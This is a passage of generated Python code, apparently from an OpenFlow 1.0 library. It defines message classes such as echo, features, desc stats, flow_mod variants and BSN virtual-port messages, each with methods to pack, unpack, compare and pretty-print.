experimenter = 6035143
subtype = 26
def __init__(self, xid=None, status=None):
if xid != None:
self.xid = xid
else:
self.xid = None
if status != None:
self.status = status
else:
self.status = 0
return
def pack(self):
packed = []
packed.append(struct.pack("!B", self.version))
packed.append(struct.pack("!B", self.type))
packed.append(struct.pack("!H", 0)) # placeholder for length at index 2
packed.append(struct.pack("!L", self.xid))
packed.append(struct.pack("!L", self.experimenter))
packed.append(struct.pack("!L", self.subtype))
packed.append(struct.pack("!L", self.status))
length = sum([len(x) for x in packed])
packed[2] = struct.pack("!H", length)
return ''.join(packed)
@staticmethod
def unpack(reader):
obj = bsn_virtual_port_remove_reply()
_version = reader.read("!B")[0]
assert(_version == 1)
_type = reader.read("!B")[0]
assert(_type == 4)
_length = reader.read("!H")[0]
orig_reader = reader
reader = orig_reader.slice(_length, 4)
obj.xid = reader.read("!L")[0]
_experimenter = reader.read("!L")[0]
assert(_experimenter == 6035143)
_subtype = reader.read("!L")[0]
assert(_subtype == 26)
obj.status = reader.read("!L")[0]
return obj
def __eq__(self, other):
if type(self) != type(other): return False
if self.xid != other.xid: return False
if self.status != other.status: return False
return True
def pretty_print(self, q):
q.text("bsn_virtual_port_remove_reply {")
with q.group():
with q.indent(2):
q.breakable()
q.text("xid = ");
if self.xid != None:
q.text("%#x" % self.xid)
else:
q.text('None')
q.text(","); q.breakable()
q.text("status = ");
q.text("%#x" % self.status)
q.breakable()
q.text('}')
bsn_header.subtypes[26] = bsn_virtual_port_remove_reply
class bsn_virtual_port_remove_request(bsn_header):
version = 1
type = 4
experimenter = 6035143
subtype = 17
def __init__(self, xid=None, vport_no=None):
if xid != None:
self.xid = xid
else:
self.xid = None
if vport_no != None:
self.vport_no = vport_no
else:
self.vport_no = 0
return
def pack(self):
packed = []
packed.append(struct.pack("!B", self.version))
packed.append(struct.pack("!B", self.type))
packed.append(struct.pack("!H", 0)) # placeholder for length at index 2
packed.append(struct.pack("!L", self.xid))
packed.append(struct.pack("!L", self.experimenter))
packed.append(struct.pack("!L", self.subtype))
packed.append(struct.pack("!L", self.vport_no))
length = sum([len(x) for x in packed])
packed[2] = struct.pack("!H", length)
return ''.join(packed)
@staticmethod
def unpack(reader):
obj = bsn_virtual_port_remove_request()
_version = reader.read("!B")[0]
assert(_version == 1)
_type = reader.read("!B")[0]
assert(_type == 4)
_length = reader.read("!H")[0]
orig_reader = reader
reader = orig_reader.slice(_length, 4)
obj.xid = reader.read("!L")[0]
_experimenter = reader.read("!L")[0]
assert(_experimenter == 6035143)
_subtype = reader.read("!L")[0]
assert(_subtype == 17)
obj.vport_no = reader.read("!L")[0]
return obj
def __eq__(self, other):
if type(self) != type(other): return False
if self.xid != other.xid: return False
if self.vport_no != other.vport_no: return False
return True
def pretty_print(self, q):
q.text("bsn_virtual_port_remove_request {")
with q.group():
with q.indent(2):
q.breakable()
q.text("xid = ");
if self.xid != None:
q.text("%#x" % self.xid)
else:
q.text('None')
q.text(","); q.breakable()
q.text("vport_no = ");
q.text("%#x" % self.vport_no)
q.breakable()
q.text('}')
bsn_header.subtypes[17] = bsn_virtual_port_remove_request
class desc_stats_reply(stats_reply):
version = 1
type = 17
stats_type = 0
def __init__(self, xid=None, flags=None, mfr_desc=None, hw_desc=None, sw_desc=None, serial_num=None, dp_desc=None):
if xid != None:
self.xid = xid
else:
self.xid = None
if flags != None:
self.flags = flags
else:
self.flags = 0
if mfr_desc != None:
self.mfr_desc = mfr_desc
else:
self.mfr_desc = ""
if hw_desc != None:
self.hw_desc = hw_desc
else:
self.hw_desc = ""
if sw_desc != None:
self.sw_desc = sw_desc
else:
self.sw_desc = ""
if serial_num != None:
self.serial_num = serial_num
else:
self.serial_num = ""
if dp_desc != None:
self.dp_desc = dp_desc
else:
self.dp_desc = ""
return
def pack(self):
packed = []
packed.append(struct.pack("!B", self.version))
packed.append(struct.pack("!B", self.type))
packed.append(struct.pack("!H", 0)) # placeholder for length at index 2
packed.append(struct.pack("!L", self.xid))
packed.append(struct.pack("!H", self.stats_type))
packed.append(struct.pack("!H", self.flags))
packed.append(struct.pack("!256s", self.mfr_desc))
packed.append(struct.pack("!256s", self.hw_desc))
packed.append(struct.pack("!256s", self.sw_desc))
packed.append(struct.pack("!32s", self.serial_num))
packed.append(struct.pack("!256s", self.dp_desc))
length = sum([len(x) for x in packed])
packed[2] = struct.pack("!H", length)
return ''.join(packed)
@staticmethod
def unpack(reader):
obj = desc_stats_reply()
_version = reader.read("!B")[0]
assert(_version == 1)
_type = reader.read("!B")[0]
assert(_type == 17)
_length = reader.read("!H")[0]
orig_reader = reader
reader = orig_reader.slice(_length, 4)
obj.xid = reader.read("!L")[0]
_stats_type = reader.read("!H")[0]
assert(_stats_type == 0)
obj.flags = reader.read("!H")[0]
obj.mfr_desc = reader.read("!256s")[0].rstrip("\x00")
obj.hw_desc = reader.read("!256s")[0].rstrip("\x00")
obj.sw_desc = reader.read("!256s")[0].rstrip("\x00")
obj.serial_num = reader.read("!32s")[0].rstrip("\x00")
obj.dp_desc = reader.read("!256s")[0].rstrip("\x00")
return obj
def __eq__(self, other):
if type(self) != type(other): return False
if self.xid != other.xid: return False
if self.flags != other.flags: return False
if self.mfr_desc != other.mfr_desc: return False
if self.hw_desc != other.hw_desc: return False
if self.sw_desc != other.sw_desc: return False
if self.serial_num != other.serial_num: return False
if self.dp_desc != other.dp_desc: return False
return True
def pretty_print(self, q):
q.text("desc_stats_reply {")
with q.group():
with q.indent(2):
q.breakable()
q.text("xid = ");
if self.xid != None:
q.text("%#x" % self.xid)
else:
q.text('None')
q.text(","); q.breakable()
q.text("flags = ");
q.text("%#x" % self.flags)
q.text(","); q.breakable()
q.text("mfr_desc = ");
q.pp(self.mfr_desc)
q.text(","); q.breakable()
q.text("hw_desc = ");
q.pp(self.hw_desc)
q.text(","); q.breakable()
q.text("sw_desc = ");
q.pp(self.sw_desc)
q.text(","); q.breakable()
q.text("serial_num = ");
q.pp(self.serial_num)
q.text(","); q.breakable()
q.text("dp_desc = ");
q.pp(self.dp_desc)
q.breakable()
q.text('}')
stats_reply.subtypes[0] = desc_stats_reply
class desc_stats_request(stats_request):
version = 1
type = 16
stats_type = 0
def __init__(self, xid=None, flags=None):
if xid != None:
self.xid = xid
else:
self.xid = None
if flags != None:
self.flags = flags
else:
self.flags = 0
return
def pack(self):
packed = []
packed.append(struct.pack("!B", self.version))
packed.append(struct.pack("!B", self.type))
packed.append(struct.pack("!H", 0)) # placeholder for length at index 2
packed.append(struct.pack("!L", self.xid))
packed.append(struct.pack("!H", self.stats_type))
packed.append(struct.pack("!H", self.flags))
length = sum([len(x) for x in packed])
packed[2] = struct.pack("!H", length)
return ''.join(packed)
@staticmethod
def unpack(reader):
obj = desc_stats_request()
_version = reader.read("!B")[0]
assert(_version == 1)
_type = reader.read("!B")[0]
assert(_type == 16)
_length = reader.read("!H")[0]
orig_reader = reader
reader = orig_reader.slice(_length, 4)
obj.xid = reader.read("!L")[0]
_stats_type = reader.read("!H")[0]
assert(_stats_type == 0)
obj.flags = reader.read("!H")[0]
return obj
def __eq__(self, other):
if type(self) != type(other): return False
if self.xid != other.xid: return False
if self.flags != other.flags: return False
return True
def pretty_print(self, q):
q.text("desc_stats_request {")
with q.group():
with q.indent(2):
q.breakable()
q.text("xid = ");
if self.xid != None:
q.text("%#x" % self.xid)
else:
q.text('None')
q.text(","); q.breakable()
q.text("flags = ");
q.text("%#x" % self.flags)
q.breakable()
q.text('}')
stats_request.subtypes[0] = desc_stats_request
class echo_reply(message):
version = 1
type = 3
def __init__(self, xid=None, data=None):
if xid != None:
self.xid = xid
else:
self.xid = None
if data != None:
self.data = data
else:
self.data = ''
return
def pack(self):
packed = []
packed.append(struct.pack("!B", self.version))
packed.append(struct.pack("!B", self.type))
packed.append(struct.pack("!H", 0)) # placeholder for length at index 2
packed.append(struct.pack("!L", self.xid))
packed.append(self.data)
length = sum([len(x) for x in packed])
packed[2] = struct.pack("!H", length)
return ''.join(packed)
@staticmethod
def unpack(reader):
obj = echo_reply()
_version = reader.read("!B")[0]
assert(_version == 1)
_type = reader.read("!B")[0]
assert(_type == 3)
_length = reader.read("!H")[0]
orig_reader = reader
reader = orig_reader.slice(_length, 4)
obj.xid = reader.read("!L")[0]
obj.data = str(reader.read_all())
return obj
def __eq__(self, other):
if type(self) != type(other): return False
if self.xid != other.xid: return False
if self.data != other.data: return False
return True
def pretty_print(self, q):
q.text("echo_reply {")
with q.group():
with q.indent(2):
q.breakable()
q.text("xid = ");
if self.xid != None:
q.text("%#x" % self.xid)
else:
q.text('None')
q.text(","); q.breakable()
q.text("data = ");
q.pp(self.data)
q.breakable()
q.text('}')
message.subtypes[3] = echo_reply
class echo_request(message):
version = 1
type = 2
def __init__(self, xid=None, data=None):
if xid != None:
self.xid = xid
else:
self.xid = None
if data != None:
self.data = data
else:
self.data = ''
return
def pack(self):
packed = []
packed.append(struct.pack("!B", self.version))
packed.append(struct.pack("!B", self.type))
packed.append(struct.pack("!H", 0)) # placeholder for length at index 2
packed.append(struct.pack("!L", self.xid))
packed.append(self.data)
length = sum([len(x) for x in packed])
packed[2] = struct.pack("!H", length)
return ''.join(packed)
@staticmethod
def unpack(reader):
obj = echo_request()
_version = reader.read("!B")[0]
assert(_version == 1)
_type = reader.read("!B")[0]
assert(_type == 2)
_length = reader.read("!H")[0]
orig_reader = reader
reader = orig_reader.slice(_length, 4)
obj.xid = reader.read("!L")[0]
obj.data = str(reader.read_all())
return obj
def __eq__(self, other):
if type(self) != type(other): return False
if self.xid != other.xid: return False
if self.data != other.data: return False
return True
def pretty_print(self, q):
q.text("echo_request {")
with q.group():
with q.indent(2):
q.breakable()
q.text("xid = ");
if self.xid != None:
q.text("%#x" % self.xid)
else:
q.text('None')
q.text(","); q.breakable()
q.text("data = ");
q.pp(self.data)
q.breakable()
q.text('}')
message.subtypes[2] = echo_request
class features_reply(message):
version = 1
type = 6
def __init__(self, xid=None, datapath_id=None, n_buffers=None, n_tables=None, capabilities=None, actions=None, ports=None):
if xid != None:
self.xid = xid
else:
self.xid = None
if datapath_id != None:
self.datapath_id = datapath_id
else:
self.datapath_id = 0
if n_buffers != None:
self.n_buffers = n_buffers
else:
self.n_buffers = 0
if n_tables != None:
self.n_tables = n_tables
else:
self.n_tables = 0
if capabilities != None:
self.capabilities = capabilities
else:
self.capabilities = 0
if actions != None:
self.actions = actions
else:
self.actions = 0
if ports != None:
self.ports = ports
else:
self.ports = []
return
def pack(self):
packed = []
packed.append(struct.pack("!B", self.version))
packed.append(struct.pack("!B", self.type))
packed.append(struct.pack("!H", 0)) # placeholder for length at index 2
packed.append(struct.pack("!L", self.xid))
packed.append(struct.pack("!Q", self.datapath_id))
packed.append(struct.pack("!L", self.n_buffers))
packed.append(struct.pack("!B", self.n_tables))
packed.append('\x00' * 3)
packed.append(struct.pack("!L", self.capabilities))
packed.append(struct.pack("!L", self.actions))
packed.append(loxi.generic_util.pack_list(self.ports))
length = sum([len(x) for x in packed])
packed[2] = struct.pack("!H", length)
return ''.join(packed)
@staticmethod
def unpack(reader):
obj = features_reply()
_version = reader.read("!B")[0]
assert(_version == 1)
_type = reader.read("!B")[0]
assert(_type == 6)
_length = reader.read("!H")[0]
orig_reader = reader
reader = orig_reader.slice(_length, 4)
obj.xid = reader.read("!L")[0]
obj.datapath_id = reader.read("!Q")[0]
obj.n_buffers = reader.read("!L")[0]
obj.n_tables = reader.read("!B")[0]
reader.skip(3)
obj.capabilities = reader.read("!L")[0]
obj.actions = reader.read("!L")[0]
obj.ports = loxi.generic_util.unpack_list(reader, ofp.common.port_desc.unpack)
return obj
def __eq__(self, other):
if type(self) != type(other): return False
if self.xid != other.xid: return False
if self.datapath_id != other.datapath_id: return False
if self.n_buffers != other.n_buffers: return False
if self.n_tables != other.n_tables: return False
if self.capabilities != other.capabilities: return False
if self.actions != other.actions: return False
if self.ports != other.ports: return False
return True
def pretty_print(self, q):
q.text("features_reply {")
with q.group():
with q.indent(2):
q.breakable()
q.text("xid = ");
if self.xid != None:
q.text("%#x" % self.xid)
else:
q.text('None')
q.text(","); q.breakable()
q.text("datapath_id = ");
q.text("%#x" % self.datapath_id)
q.text(","); q.breakable()
q.text("n_buffers = ");
q.text("%#x" % self.n_buffers)
q.text(","); q.breakable()
q.text("n_tables = ");
q.text("%#x" % self.n_tables)
q.text(","); q.breakable()
q.text("capabilities = ");
q.text("%#x" % self.capabilities)
q.text(","); q.breakable()
q.text("actions = ");
q.text("%#x" % self.actions)
q.text(","); q.breakable()
q.text("ports = ");
q.pp(self.ports)
q.breakable()
q.text('}')
message.subtypes[6] = features_reply
class features_request(message):
version = 1
type = 5
def __init__(self, xid=None):
if xid != None:
self.xid = xid
else:
self.xid = None
return
def pack(self):
packed = []
packed.append(struct.pack("!B", self.version))
packed.append(struct.pack("!B", self.type))
packed.append(struct.pack("!H", 0)) # placeholder for length at index 2
packed.append(struct.pack("!L", self.xid))
length = sum([len(x) for x in packed])
packed[2] = struct.pack("!H", length)
return ''.join(packed)
@staticmethod
def unpack(reader):
obj = features_request()
_version = reader.read("!B")[0]
assert(_version == 1)
_type = reader.read("!B")[0]
assert(_type == 5)
_length = reader.read("!H")[0]
orig_reader = reader
reader = orig_reader.slice(_length, 4)
obj.xid = reader.read("!L")[0]
return obj
def __eq__(self, other):
if type(self) != type(other): return False
if self.xid != other.xid: return False
return True
def pretty_print(self, q):
q.text("features_request {")
with q.group():
with q.indent(2):
q.breakable()
q.text("xid = ");
if self.xid != None:
q.text("%#x" % self.xid)
else:
q.text('None')
q.breakable()
q.text('}')
message.subtypes[5] = features_request
class flow_mod(message):
subtypes = {}
version = 1
type = 14
def __init__(self, xid=None, match=None, cookie=None, _command=None, idle_timeout=None, hard_timeout=None, priority=None, buffer_id=None, out_port=None, flags=None, actions=None):
if xid != None:
self.xid = xid
else:
self.xid = None
if match != None:
self.match = match
else:
self.match = ofp.match()
if cookie != None:
self.cookie = cookie
else:
self.cookie = 0
if _command != None:
self._command = _command
else:
self._command = 0
if idle_timeout != None:
self.idle_timeout = idle_timeout
else:
self.idle_timeout = 0
if hard_timeout != None:
self.hard_timeout = hard_timeout
else:
self.hard_timeout = 0
if priority != None:
self.priority = priority
else:
self.priority = 0
if buffer_id != None:
self.buffer_id = buffer_id
else:
self.buffer_id = 0
if out_port != None:
self.out_port = out_port
else:
self.out_port = 0
if flags != None:
self.flags = flags
else:
self.flags = 0
if actions != None:
self.actions = actions
else:
self.actions = []
return
def pack(self):
packed = []
packed.append(struct.pack("!B", self.version))
packed.append(struct.pack("!B", self.type))
packed.append(struct.pack("!H", 0)) # placeholder for length at index 2
packed.append(struct.pack("!L", self.xid))
packed.append(self.match.pack())
packed.append(struct.pack("!Q", self.cookie))
packed.append(util.pack_fm_cmd(self._command))
packed.append(struct.pack("!H", self.idle_timeout))
packed.append(struct.pack("!H", self.hard_timeout))
packed.append(struct.pack("!H", self.priority))
packed.append(struct.pack("!L", self.buffer_id))
packed.append(util.pack_port_no(self.out_port))
packed.append(struct.pack("!H", self.flags))
packed.append(loxi.generic_util.pack_list(self.actions))
length = sum([len(x) for x in packed])
packed[2] = struct.pack("!H", length)
return ''.join(packed)
@staticmethod
def unpack(reader):
subtype, = reader.peek('!H', 56)
subclass = flow_mod.subtypes.get(subtype)
if subclass:
return subclass.unpack(reader)
obj = flow_mod()
_version = reader.read("!B")[0]
assert(_version == 1)
_type = reader.read("!B")[0]
assert(_type == 14)
_length = reader.read("!H")[0]
orig_reader = reader
reader = orig_reader.slice(_length, 4)
obj.xid = reader.read("!L")[0]
obj.match = ofp.match.unpack(reader)
obj.cookie = reader.read("!Q")[0]
obj._command = util.unpack_fm_cmd(reader)
obj.idle_timeout = reader.read("!H")[0]
obj.hard_timeout = reader.read("!H")[0]
obj.priority = reader.read("!H")[0]
obj.buffer_id = reader.read("!L")[0]
obj.out_port = util.unpack_port_no(reader)
obj.flags = reader.read("!H")[0]
obj.actions = loxi.generic_util.unpack_list(reader, ofp.action.action.unpack)
return obj
def __eq__(self, other):
if type(self) != type(other): return False
if self.xid != other.xid: return False
if self.match != other.match: return False
if self.cookie != other.cookie: return False
if self._command != other._command: return False
if self.idle_timeout != other.idle_timeout: return False
if self.hard_timeout != other.hard_timeout: return False
if self.priority != other.priority: return False
if self.buffer_id != other.buffer_id: return False
if self.out_port != other.out_port: return False
if self.flags != other.flags: return False
if self.actions != other.actions: return False
return True
def pretty_print(self, q):
q.text("flow_mod {")
with q.group():
with q.indent(2):
q.breakable()
q.text("xid = ");
if self.xid != None:
q.text("%#x" % self.xid)
else:
q.text('None')
q.text(","); q.breakable()
q.text("match = ");
q.pp(self.match)
q.text(","); q.breakable()
q.text("cookie = ");
q.text("%#x" % self.cookie)
q.text(","); q.breakable()
q.text("idle_timeout = ");
q.text("%#x" % self.idle_timeout)
q.text(","); q.breakable()
q.text("hard_timeout = ");
q.text("%#x" % self.hard_timeout)
q.text(","); q.breakable()
q.text("priority = ");
q.text("%#x" % self.priority)
q.text(","); q.breakable()
q.text("buffer_id = ");
q.text("%#x" % self.buffer_id)
q.text(","); q.breakable()
q.text("out_port = ");
q.text(util.pretty_port(self.out_port))
q.text(","); q.breakable()
q.text("flags = ");
q.text("%#x" % self.flags)
q.text(","); q.breakable()
q.text("actions = ");
q.pp(self.actions)
q.breakable()
q.text('}')
message.subtypes[14] = flow_mod
class flow_add(flow_mod):
version = 1
type = 14
_command = 0
def __init__(self, xid=None, match=None, cookie=None, idle_timeout=None, hard_timeout=None, priority=None, buffer_id=None, out_port=None, flags=None, actions=None):
if xid != None:
self.xid = xid
else:
self.xid = None
if match != None:
self.match = match
else:
self.match = ofp.match()
if cookie != None:
self.cookie = cookie
else:
self.cookie = 0
if idle_timeout != None:
self.idle_timeout = idle_timeout
else:
self.idle_timeout = 0
if hard_timeout != None:
self.hard_timeout = hard_timeout
else:
self.hard_timeout = 0
if priority != None:
self.priority = priority
else:
self.priority = 0
if buffer_id != None:
self.buffer_id = buffer_id
else:
self.buffer_id = 0
if out_port != None:
self.out_port = out_port
else:
self.out_port = 0
if flags != None:
self.flags = flags
else:
self.flags = 0
if actions != None:
self.actions = actions
else:
self.actions = []
return
def pack(self):
packed = []
packed.append(struct.pack("!B", self.version))
packed.append(struct.pack("!B", self.type))
packed.append(struct.pack("!H", 0)) # placeholder for length at index 2
packed.append(struct.pack("!L", self.xid))
packed.append(self.match.pack())
packed.append(struct.pack("!Q", self.cookie))
packed.append(util.pack_fm_cmd(self._command))
packed.append(struct.pack("!H", self.idle_timeout))
packed.append(struct.pack("!H", self.hard_timeout))
packed.append(struct.pack("!H", self.priority))
packed.append(struct.pack("!L", self.buffer_id))
packed.append(util.pack_port_no(self.out_port))
packed.append(struct.pack("!H", self.flags))
packed.append(loxi.generic_util.pack_list(self.actions))
length = sum([len(x) for x in packed])
packed[2] = struct.pack("!H", length)
return ''.join(packed)
@staticmethod
def unpack(reader):
obj = flow_add()
_version = reader.read("!B")[0]
assert(_version == 1)
_type = reader.read("!B")[0]
assert(_type == 14)
_length = reader.read("!H")[0]
orig_reader = reader
reader = orig_reader.slice(_length, 4)
obj.xid = reader.read("!L")[0]
obj.match = ofp.match.unpack(reader)
obj.cookie = reader.read("!Q")[0]
__command = util.unpack_fm_cmd(reader)
assert(__command == 0)
obj.idle_timeout = reader.read("!H")[0]
obj.hard_timeout = reader.read("!H")[0]
obj.priority = reader.read("!H")[0]
obj.buffer_id = reader.read("!L")[0]
obj.out_port = util.unpack_port_no(reader)
obj.flags = reader.read("!H")[0]
obj.actions = loxi.generic_util.unpack_list(reader, ofp.action.action.unpack)
return obj
def __eq__(self, other):
if type(self) != type(other): return False
if self.xid != other.xid: return False
if self.match != other.match: return False
if self.cookie != other.cookie: return False
if self.idle_timeout != other.idle_timeout: return False
if self.hard_timeout != other.hard_timeout: return False
if self.priority != other.priority: return False
if self.buffer_id != other.buffer_id: return False
if self.out_port != other.out_port: return False
if self.flags != other.flags: return False
if self.actions != other.actions: return False
return True
def pretty_print(self, q):
q.text("flow_add {")
with q.group():
with q.indent(2):
q.breakable()
q.text("xid = ");
if self.xid != None:
q.text("%#x" % self.xid)
else:
q.text('None')
q.text(","); q.breakable()
q.text("match = ");
q.pp(self.match)
q.text(","); q.breakable()
q.text("cookie = ");
q.text("%#x" % self.cookie)
q.text(","); q.breakable()
q.text("idle_timeout = ");
q.text("%#x" % self.idle_timeout)
q.text(","); q.breakable()
q.text("hard_timeout = ");
q.text("%#x" % self.hard_timeout)
q.text(","); q.breakable()
q.text("priority = ");
q.text("%#x" % self.priority)
q.text(","); q.breakable()
q.text("buffer_id = ");
q.text("%#x" % self.buffer_id)
q.text(","); q.breakable()
q.text("out_port = ");
q.text(util.pretty_port(self.out_port))
q.text(","); q.breakable()
q.text("flags = ");
q.text("%#x" % self.flags)
q.text(","); q.breakable()
q.text("actions = ");
q.pp(self.actions)
q.breakable()
q.text('}')
flow_mod.subtypes[0] = flow_add
class flow_delete(flow_mod):
version = 1
type = 14
_command = 3
def __init__(self, xid=None, match=None, cookie=None, idle_timeout=None, hard_timeout=None, priority=None, buffer_id=None, out_port=None, flags=None, actions=None):
if xid != None:
self.xid = xid
else:
self.xid = None
if match != None:
self.match = match
else:
self.match = ofp.match()
if cookie != None:
self.cookie = cookie
else:
self.cookie = 0
if idle_timeout != None:
self.idle_timeout = idle_timeout
else:
self.idle_timeout = 0
if hard_timeout != None:
self.hard_timeout = hard_timeout
else:
self.hard_timeout = 0
if priority != None:
self.priority = priority
else:
self.priority = 0
if buffer_id != None:
self.buffer_id = buffer_id
else:
self.buffer_id = 0
if out_port != None:
self.out_port = out_port
else:
self.out_port = 0
if flags != None:
self.flags = flags
else:
self.flags = 0
if actions != None:
self.actions = actions
else:
self.actions = []
return
def pack(self):
packed = []
packed.append(struct.pack("!B", self.version))
packed.append(struct.pack("!B", self.type))
packed.append(struct.pack("!H", 0)) # placeholder for length at index 2
packed.append(struct.pack("!L", self.xid))
packed.append(self.match.pack())
packed.append(struct.pack("!Q", self.cookie))
packed.append(util.pack_fm_cmd(self._command))
packed.append(struct.pack("!H", self.idle_timeout))
packed.append(struct.pack("!H", self.hard_timeout))
packed.append(struct.pack("!H", self.priority))
packed.append(struct.pack("!L", self.buffer_id))
packed.append(util.pack_port_no(self.out_port))
packed.append(struct.pack("!H", self.flags))
packed.append(loxi.generic_util.pack_list(self.actions))
length = sum([len(x) for x in packed])
packed[2] = struct.pack("!H", length)
return ''.join(packed)
@staticmethod
def unpack(reader):
obj = flow_delete()
_version = reader.read("!B")[0]
assert(_version == 1)
_type = reader.read("!B")[0]
assert(_type == 14)
_length = reader.read("!H")[0]
orig_reader = reader
reader = orig_reader.slice(_length, 4)
obj.xid = reader.read("!L")[0]
obj.match = ofp.match.unpack(reader)
obj.cookie = reader.read("!Q")[0]
__command = util.unpack_fm_cmd(reader)
assert(__command == 3)
obj.idle_timeout = reader.read("!H")[0]
obj.hard_timeout = reader.read("!H")[0]
obj.priority = reader.read("!H")[0]
obj.buffer_id = reader.read("!L")[0]
obj.out_port = util.unpack_port_no(reader)
obj.flags = reader.read("!H")[0]
obj.actions = loxi.generic_util.unpack_list(reader, ofp.action.action.unpack)
return obj
def __eq__(self, other):
if type(self) != type(other): return False
if self.xid != other.xid: return False
if self.match != other.match: return False
if self.cookie != other.cookie: return False
if self.idle_timeout != other.idle_timeout: return False
if self.hard_timeout != other.hard_timeout: return False
if self.priority != other.priority: return False
if self.buffer_id != other.buffer_id: return False
if self.out_port != other.out_port: return False
if self.flags != other.flags: return False
if self.actions != other.actions: return False
return True
def pretty_print(self, q):
q.text("flow_delete {")
with q.group():
with q.indent(2):
q.breakable()
q.text("xid = ");
if self.xid != None:
q.text("%#x" % self.xid)
else:
q.text('None')
q.text(","); q.breakable()
q.text("match = ");
q.pp(self.match)
q.text(","); q.breakable()
q.text("cookie = ");
q.text("%#x" % self.cookie)
q.text(","); q.breakable()
q.text("idle_timeout = ");
q.text("%#x" % self.idle_timeout)
q.text(","); q.breakable()
q.text("hard_timeout = ");
q.text("%#x" % self.hard_timeout)
q.text(","); q.breakable()
q.text("priority = ");
q.text("%#x" % self.priority)
q.text(","); q.breakable()
q.text("buffer_id = ");
q.text("%#x" % self.buffer_id)
q.text(","); q.breakable()
q.text("out_port = ");
q.text(util.pretty_port(self.out_port))
q.text(","); q.breakable()
q.text("flags = ");
q.text("%#x" % self.flags)
q.text(","); q.breakable()
q.text("actions = ");
q.pp(self.actions)
q.breakable()
q.text('}')
flow_mod.subtypes[3] = flow_delete
class flow_delete_strict(flow_mod):
version = 1
type = 14
_command = 4
def __init__(self, xid=None, match=None, cookie=None, idle_timeout=None, hard_timeout=None, priority=None, buffer_id=None, out_port=None, flags=None, actions=None):
if xid != None:
self.xid = xid
else:
self.xid = None
if match != None:
self.match = match
else:
self.match = ofp.match()
if cookie != None:
self.cookie = cookie
else:
self.cookie = 0
if idle_timeout != None:
self.idle_timeout = idle_timeout
else:
self.idle_timeout = 0
if hard_timeout != None:
self.hard_timeout = hard_timeout
else:
self.hard_timeout = 0
if priority != None:
self.priority = priority
else:
self.priority = 0
if buffer_id != None:
self.buffer_id = buffer_id
else:
self.buffer_id = 0
if out_port != None:
self.out_port = out_port
else:
self.out_port = 0
if flags != None:
self.flags = flags
else:
self.flags = 0
if actions != None:
self.actions = actions
else:
self.actions = []
return
def pack(self):
packed = []
packed.append(struct.pack("!B", self.version))
packed.append(struct.pack("!B", self.type))
packed.append(struct.pack("!H", 0)) # placeholder for length at index 2
packed.append(struct.pack("!L", self.xid))
packed.append(self.match.pack())
packed.append(struct.pack("!Q", self.cookie))
packed.append(util.pack_fm_cmd(self._command))
packed.append(struct.pack("!H", self.idle_timeout))
packed.append(struct.pack("!H", self.hard_timeout))
packed.append(struct.pack("!H", self.priority))
packed.append(struct.pack("!L", self.buffer_id))
packed.append(util.pack_port_no(self.out_port))
packed.append(struct.pack("!H", self.flags))
packed.append(loxi.generic_util.pack_list(self.actions))
length = sum([len(x) for x in packed])
packed[2] = struct.pack("!H", length)
return ''.join(packed)
@staticmethod
def unpack(reader):
obj = flow_delete_strict()
_version = reader.read("!B")[0]
assert(_version == 1)
_type = reader.read("!B")[0]
assert(_type == 14)
_length = reader.read("!H")[0]
orig_reader = reader
reader = orig_reader.slice(_length, 4)
obj.xid = reader.read("!L")[0]
obj.match = ofp.match.unpack(reader)
obj.cookie = reader.read("!Q")[0]
__command = util.unpack_fm_cmd(reader)
assert(__command == 4)
obj.idle_timeout = reader.read("!H")[0]
obj.hard_timeout = reader.read("!H")[0]
obj.priority = reader.read("!H")[0]
obj.buffer_id = reader.read("!L")[0]
obj.out_port = util.unpack_port_no(reader)
obj.flags = reader.read("!H")[0]
obj.actions = loxi.generic_util.unpack_list(reader, ofp.action.action.unpack)
return obj
def __eq__(self, other):
if type(self) != type(other): return False
if self.xid != other.xid: return False
if self.match != other.match: return False
if self.cookie != other.cookie: return False
if self.idle_timeout != other.idle_timeout: return False
if self.hard_timeout != other.hard_timeout: return False
if self.priority != other.priority: return False
if self.buffer_id != other.buffer_id: return False
if self.out_port != other.out_port: return False
if self.flags != other.flags: return False
if self.actions != other.actions: return False
return True
def pretty_print(self, q):
q.text("flow_delete_strict {")
with q.group():
with q.indent(2):
q.breakable()
q.text("xid = ");
if self.xid != None:
q.text("%#x" % self.xid)
else:
q.text('None')
q.text(","); q.breakable()
q.text("match = ");
q.pp(self.match)
q.text(","); q.breakable()
q.text("cookie = ");
q.text("%#x" % self.cookie)
q.text(","); q.breakable()
q.text("idle_timeout = ");
q.text("%#x" % self.idle_timeout)
q.text(","); q.breakable()
q.text("hard_timeout = ");
q.text("%#x" % self.hard_timeout)
q.text(","); q.breakable()
q.text("priority = ");
q.text("%#x" % self.priority)
q.text(","); q.breakable()
q.text("buffer_id = ");
q.text("%#x" % self.buffer_id)
q.text(","); q.breakable()
q.text("out_port = ");
q.text(util.pretty_port(self.out_port))
q.text(","); q.breakable()
q.text("flags = ");
q.text("%#x" % self.flags)
q.text(","); q.breakable()
q.text("actions = ");
q.pp(self.actions)
q.breakable()
q.text('}')
flow_mod.subtypes[4] = flow_delete_strict
class flow_mod_failed_error_msg(error_msg):
version = 1
type = 1
err_type = 3
def __init__(self, xid=None, code=None, data=None):
if xid != None:
self.xid = xid
else:
self.xid = None
if code != None:
self.code = code
else:
self.code = 0
if data != None:
self.data = data
else:
self.data = ''
return
def pack(self):
packed = []
packed.append(struct.pack("!B", self.version))
packed.append(struct.pack("!B", self.type))
packed.append(struct.pack("!H", 0)) # placeholder for length at index 2
packed.append(struct.pack("!L", self.xid))
packed.append(struct.pack("!H", self.err_type))
packed.append(struct.pack("!H", self.code))
packed.append(self.data)
length = sum([len(x) for x in packed])
packed[2] = struct.pack("!H", length)
return ''.join(packed)
@staticmethod
def unpack(reader):
obj = flow_mod_failed_error_msg()
_version = reader.read("!B")[0]
assert(_version == 1)
_type = reader.read("!B")[0]
assert(_type == 1)
_length = reader.read("!H")[0]
orig_reader = reader
reader = orig_reader.slice(_length, 4)
obj.xid = reader.read("!L")[0]
_err_type = reader.read("!H")[0]
assert(_err_type == 3)
obj.code = reader.read("!H")[0]
obj.data = str(reader.read_all())
return obj
def __eq__(self, other):
if type(self) != type(other): return False
if self.xid != other.xid: return False
if self.code != other.code: return False
if self.data != other.data: return False
return True
def pretty_print(self, q):
q.text("flow_mod_failed_error_msg {")
with q.group():
with q.indent(2):
q.breakable()
q.text("xid = ");
if self.xid != None:
q.text("%#x" % self.xid)
else:
q.text('None')
q.text(","); q.breakable()
q.text("code = ");
q.text("%#x" % self.code)
q.text(","); q.breakable()
q.text("data = ");
q.pp(self.data)
q.breakable()
q.text('}')
